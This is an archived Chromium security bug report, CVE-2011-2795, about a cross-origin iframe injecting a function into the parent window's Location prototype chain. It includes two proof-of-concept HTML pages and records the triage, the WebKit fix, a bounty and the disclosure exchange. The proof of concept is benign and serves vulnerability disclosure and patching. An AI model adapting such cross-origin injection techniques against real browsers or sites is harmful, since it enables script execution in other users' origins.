Project: chromium
Status: Fixed
Closed: Jun 2011
Pri: 0
Type: Bug-Security
XSS injection via prototype chain
Reported by shih.wei...@gmail.com, Jun 24 2011
Chrome Version       : 12.0.742.100
URLs (if applicable) :
Other browsers tested:
Add OK or FAIL after other browsers where you have tested this issue:
Safari 5:
Firefox 4.x:
IE 7/8/9:

A cross-domain iframe is able to inject an arbitrary function into the window.location prototype,
which the main page then calls.


What steps will reproduce the problem?
1. Make a page in http://a.com/index01.html


<!DOCTYPE HTML>
<html>
<head>
<meta charset="utf-8">
<title></title>
<script type="text/javascript">

function onLoad() {
	console.log("'fun' in location: ", "fun" in window.location);
	console.log("'fun' in document: ", "fun" in document);
	if ("fun" in window.location)
		console.log(window.location.fun());
}

</script>
</head>
<body onLoad="onLoad();">
    <iframe width="100" height="100"
    	src="http://b.com/index02.html">
    </iframe>
</body>
</html>



2. Make another page at http://b.com/index02.html, which injects the function:


<!DOCTYPE HTML>
<html>
<head>
<meta charset="utf-8">
<script type="text/javascript">

// Touch the top window's location first: this materialises the cross-origin
// Location wrapper whose prototype chain the injection below reaches.
window.top.location;

//*/ Variant 1 (active): inject a cross-domain function via Object.prototype
Object.prototype.fun = function() {
	return("from iframe : " + window.location);
};
//*/

/*/ Variant 2 (disabled; swap the leading "//*/" and "/*/" markers to enable):
// inject via the frame's own Location prototype, which the top window's wrapper shares
window.location.__proto__.fun = function() {
	return("from iframe : " + window.location);
};
//*/
</script>
</head>
<body></body>
</html>


3. Browse http://a.com/index01.html

What is the expected result?

Console log
'fun' in location:  true
index01.html:10'fun' in document:  false
index01.html:12from iframe : http://b.com/index02.html



What happens instead?

Console log
'fun' in location:  false
index01.html:10'fun' in document:  false


Please provide any additional information below. Attach a screenshot if
possible.

 
Sorry, I pasted the wrong result.

The expected result should be:

Console log
'fun' in location:  false
index01.html:10'fun' in document:  false


What happens instead should be:

Console log
'fun' in location:  true
index01.html:10'fun' in document:  false
index01.html:12from iframe : http://b.com/index02.html
Labels: -Type-Bug Type-Security
Comment 3 by jsc...@chromium.org, Jun 24 2011
Labels: -Pri-2 Pri-0 Restrict-View-SecurityTeam
Putting up the flags (verification and triage still needed).
Cc: ager@chromium.org
Labels: SecSeverity-Medium reward-topanel
Owner: abarth@chromium.org
Status: Available
(Adam, any interest?)

Online repro: https://cevans-secure.appspot.com/static/framefunc.html
(Modified to use alert() if there is a problem, silent if not).
Fires on Chrome trunk, 13 beta.
We tested Safari, and it didn't fire, so it could be a V8-bindings-specific issue.

@shih.weilung: Can this be used to:
- _override_ existing functions in the parent frame?
- Inject a function the other way around? e.g. the parent frame injects into the child frame?
If so, the severity could be higher, but I'm going with Medium for now.
Comment 5 by jsc...@chromium.org, Jun 24 2011
Cc: japhet@chromium.org
Comment 6 by abarth@chromium.org, Jun 25 2011
Labels: -Area-Undefined Area-WebKit
Sigh.  JavaScriptCore used to have the same bug.  I thought we'd fixed all of these.
Status: Assigned
Comment 8 by abarth@chromium.org, Jun 26 2011
Status: Started
https://bugs.webkit.org/show_bug.cgi?id=63411

I'm working up a patch for this issue.  Details in the WebKit bug.

@shih.weilung: If you create an account on bugs.webkit.org, I'll CC you on the WebKit bug (which is where the patch and any associated discussion will take place).
Comment 9 by abarth@chromium.org, Jun 26 2011
Patch posted upstream for review.
Thanks, I created an account with the same email address on the WebKit bug.
Done.
Status: WillMerge
Thanks Adam!

Committed r89782: <http://trac.webkit.org/changeset/89782>
Labels: Mstone-13 ReleaseBlock-Stable
Status: FixUnreleased
Merged to M13: http://trac.webkit.org/changeset/89892
Comment 14 by mal@google.com, Jun 28 2011
Apologies for the spam, but this is an update to test changes to security@chromium.org.  Unfortunately, the test requires that I send email :(
@shih.weilung: how would you like to be credited in our release notes?
Thanks!
Please take a look at issue 76748; it looks like the same root cause.
http://code.google.com/p/chromium/issues/detail?id=76748

Should we use the name "Shih Weilung", written just like that?
Yes, "Shih Weilung".
Labels: -Restrict-View-SecurityTeam -reward-topanel Restrict-View-SecurityNotify reward-500 reward-unpaid
@shih.weilung: congrats! Although "medium" severity, this bug is sufficiently interesting to attract a $500 Chromium Security Reward. Good find!

----
Boilerplate text:
Please do NOT publicly disclose details until a fix has been released to all our
users. Early public disclosure may cancel the provisional reward.
Also, please be considerate about disclosure when the bug affects a core library
that may be used by other products.
Please do NOT share this information with third parties who are not directly
involved in fixing the bug. Doing so may cancel the provisional reward.
Please be honest if you have already disclosed anything publicly or to third parties.
----
Sigh, already disclosed publicly.
Do you have a link for the public disclosure so that we can take a look?
Labels: CVE-2011-2795
@shih.weilung: we would still like to offer you the reward, despite the misunderstanding. To get any future rewards, all we ask is a chance to push the bugfix to stable users before it is publicly disclosed.

Thanks again for finding an interesting bug!
Thanks!
I'll keep that in mind.
@scarybeasts

One more thing, my name in passport is "Shih, Wei-Long".
Sorry for any inconvenience.
Labels: SecImpacts-Stable
Batch update.
@shih.weilung: please e-mail cevans@chromium.org to collect the reward.
Labels: -reward-unpaid
Payment in system.
Lifting view restrictions.
Labels: -Restrict-View-SecurityNotify
Lifting view restrictions.
Status: Fixed
Project Member Comment 33 by bugdroid1@chromium.org, Oct 13 2012
Labels: Restrict-AddIssueComment-Commit
This issue has been closed for some time. No one will pay attention to new comments.
If you are seeing this bug or have new data, please click New Issue to start a new bug.
Project Member Comment 34 by bugdroid1@chromium.org, Mar 10 2013
Labels: -Type-Security -Area-WebKit -SecSeverity-Medium -Mstone-13 -SecImpacts-Stable Cr-Content Security-Impact-Stable Security-Severity-Medium M-13 Type-Bug-Security
Project Member Comment 35 by bugdroid1@chromium.org, Mar 13 2013
Labels: -Restrict-AddIssueComment-Commit Restrict-AddIssueComment-EditIssue
Project Member Comment 36 by bugdroid1@chromium.org, Mar 21 2013
Labels: -Security-Impact-Stable Security_Impact-Stable
Project Member Comment 37 by bugdroid1@chromium.org, Mar 21 2013
Labels: -Security-Severity-Medium Security_Severity-Medium
Project Member Comment 38 by bugdroid1@chromium.org, Apr 6 2013
Labels: -Cr-Content Cr-Blink
Project Member Comment 39 by sheriffbot@chromium.org, Oct 1 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member Comment 40 by sheriffbot@chromium.org, Oct 2 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: allpublic